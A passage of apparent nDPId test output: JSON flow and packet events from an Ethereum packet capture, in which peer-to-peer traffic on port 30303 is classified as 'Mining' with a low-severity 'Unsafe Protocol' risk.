QuEAJaLOKzWf\/o+pIN3tGz2TU0Jj7rRUsEu\/g\/J\/izFMRqT2L21hSkEIu4pwcRIudbxWCEi7R3jpR3Qx72SJ7sDxL+E2ELzgXtoJ2X4J2X7hAZ5DyvV4L2UjTbfMTNRlwVlkkGIIkt\/VYvYJ76IXUVE6r5fvcx+2tWoDAFaFaLZO1vJw5B3fbXfeObFaJ1qahJvhNhNFhtVyCw1CCw1C4QGNRrcySTkrIddsTkghzBE5yaZovlz823kaODYnxRULrhcdtfhDSmheK1rkdzx6MLgmWRkcqk5yLSRXbV7Sa9hv4TYSUZnN9gnQ9gnQ9uECK3QCjct4kYgqQwECFpzDV6FidxjszhMNuNu5KPckeHeVnNGRrmrvdWVqSm7NdhSk\/GBSTMV30P4Rv7pq1hSjo+E2ENL1ESYILzYILzbhAFgxun0r0zdyAC5SZb67xXu\/2hxGmSEaQZz1XosQe6902lrVgE71jlymkTkVmiGnjo+wcj5gGrpBHOVgGl5DUX\/hNhFCeJFKCdl+Cdl+4QPL7djWpmmTz8plIeSEj91S2rY+aeiMQAn6m9zZuLcDbcgnpEzw4Bbj2GboSA\/6fD1Ct0nUU6+rf7UzNqpXAqYL4TYRvYnEBgnZfgnZfuED0pW7OSkAUUx9PeHXwwyf7mqpd70LmGPSseSc9VRhmuql9pusBMDKDEfCCcSaAIW2BnfDoTpS113ylm2TbVhfWhF4WIGA="}
00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1578508364773,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1578508364773,"pkt":"KDc3AG3IEBMx8Tl2CABFGAF0uzdAAC8R9dE2JKDTwKgBuHZfdl8BYMxaEf6gK86OMmqC0hj8YCjT4Kxyd9QhLNhUWv84IcoZEEM5WLaEl0iNjPoH5MGkDBtHCCGzykqH2IyxlA4UZhPcyDumXz\/v4mlSvZfRB2yOu5AYhwCSwbpUWhfp9lpeKanwAQT49Pjt+E2EdbUsoIIrq4Irq7hAjNB3wOfdUkch\/RymD8COogkRfmtGHDZ3JfVp7qPL0g95b9d6Og4eqk7Oc5yCXUjsPCBRZNV\/OEkCcWVLTRMhqvhNhDb\/yRuCdl+Cdl+4QBkaEptJyzZcwNghsa\/yev+qS1D63n8u0YIQqdir49AX7Q7OxcqumEYHw1gpXkn8\/0NtWmRXiIMnyNsmLKeGv434TYQj3LNggnZggnZguEA4nJBTYkTqav4+upLVWlu+s2ggu8pFBH5psWcuz5eAhJOcvW7tSncGp+spv2HIMW\/j4SK81taE+f1zSPKQGx8uhF4WIGA="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1578508364776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508364776,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc6zkAAEARbFTAqAG40WGPAXZfw1AAiAuoYX\/X5Uw4lffkPNHSCMW6SrDFB88ojJJssa\/u4MiJ7ftgjBcFdVPuw+tvNym45804Q6\/uLh0oQsOr0riQp0FxmC7+mATc88CsFLix8wyPMseFlTK290MHGwkPORWZli5hAQHdBMuEfwAAAYJ2X4J2X8mE0WGPAYLDUICEXhYgYAU="}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364776,"flow_last_seen":1578508364776,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364776,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1578508364784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364784,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGswg056VswKgBuHZf3SosjczmxQv4NKAS\/ohsIgAAAgQFoAQCCApgPx7\/ItiUTwEDAwc="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1578508364784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364784,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnhDAqAG4NOelbN0qdl\/FC\/g0LI3M54AQEAmIYgAAAQEICiLYlUdgPx7\/"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GKKu\/6qLGwKgBuHZf3SxpEHBBX7euwaAS\/ohj6AAAAgQFoAQCCAo0GJnqItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFbPAqAG4v+qixt0sdl9ft67BaRBwQoAQEAmAJwAAAQEICiLYlUg0GJnq"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1578508364789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364789,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGVclSkdz5wKgBuHZf3TlFnUTdn3ylU6AScSDFhwAAAgQFrAQCCAqGNr5sItiVBQEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1578508364789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGSNnAqAG4UpHc+d05dl+ffKVTRZ1E3oAQECxU+wAAAQEICiLYlUqGNr5s"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1578508364817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACgG15goQ5CAwKgBuHZf3TZG9x3QfGwlk6AScSARhwAAAgQFoAQCCApyLMYFItiU0QEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1578508364817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGv6DAqAG4KEOQgN02dl98bCWTRvcd0YAQEAmgwgAAAQEICiLYlWVyLMYF"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1578508364823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364823,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACYGE48SimxDwKgBuHZf3S4uwDPtE20MrKAS\/ogQ2gAAAgQFrAQCCAqmusMwItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1578508364823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364823,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+ZbAqAG4EopsQ90udl8TbQysLsAz7oAQECws4QAAAQEICiLYlWmmusMw"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364824,"flow_last_seen":1578508364824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364824,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1578508364824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364824,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGhG3AqAG4n8tUH906dl\/csM+rAAAAALAC\/\/\/IeAAAAgQFtAEDAwUBAQgKItiVagAAAAAEAgAA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1578508364831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364831,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAOcGbbUSilEcwKgBuHZf3S\/8FjKFFTVZHKASaN8k0QAAAgQFrAQCCApjgYkbItiUTwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1578508364831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364831,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFL7AqAG4EopRHN0vdl8VNVkc\/BYyhoAQECyrKAAAAQEICiLYlW9jgYkb"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364832,"flow_last_seen":1578508364832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364832,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1578508364832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364832,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGt9PAqAG4ouQdoN07dl+4t7BdAAAAALAC\/\/8\/HwAAAgQFtAEDAwUBAQgKItiVcAAAAAAEAgAA"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364841,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADcGsuQiYawWwKgBuHZf3SnE3x7vnZqFEqAS\/ojiZQAAAgQFrAQCCAoxzJM4ItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1578508364841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364841,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqezAqAG4ImGsFt0pdl+dmoUSxN8e8IAQECz+XAAAAQEICiLYlXkxzJM4"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1578508364862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGeCSlFmshwKgBuHZf3SJnRYz4cyqhtKAScSBl3gAAAgQFrAQCCAo1gVUZItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1578508364862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGaCzAqAG4pRZrId0idl9zKqG0Z0WM+YAQECz0WAAAAQEICiLYlY01gVUZ"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1578508364877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364877,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACEGk4U0u88bwKgBuHZf3S3Pd7n11PppgaAS\/oiD+wAAAgQFoAQCCApvJb2EItiUTwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1578508364877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364877,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGdI3AqAG4NLvPG90tdl\/U+mmBz3e59oAQEAmf6AAAAQEICiLYlZpvJb2E"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364922,"flow_last_seen":1578508364922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364922,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1578508364922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364922,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+OGAAAAgQFtAEDAwUBAQgKItiVxAAAAAAEAgAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364924,"flow_last_seen":1578508364924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364924,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1578508364924,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364924,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtY\/AqAG40frwzd0+dl+QvttrAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKItiVxgAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1578508364784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364784,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGswg056VswKgBuHZf3SosjczmxQv4NKAS\/ohsIgAAAgQFoAQCCApgPx7\/ItiUTwEDAwc="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1578508364784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364784,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGnhDAqAG4NOelbN0qdl\/FC\/g0LI3M54AQEAmIYgAAAQEICiLYlUdgPx7\/"}
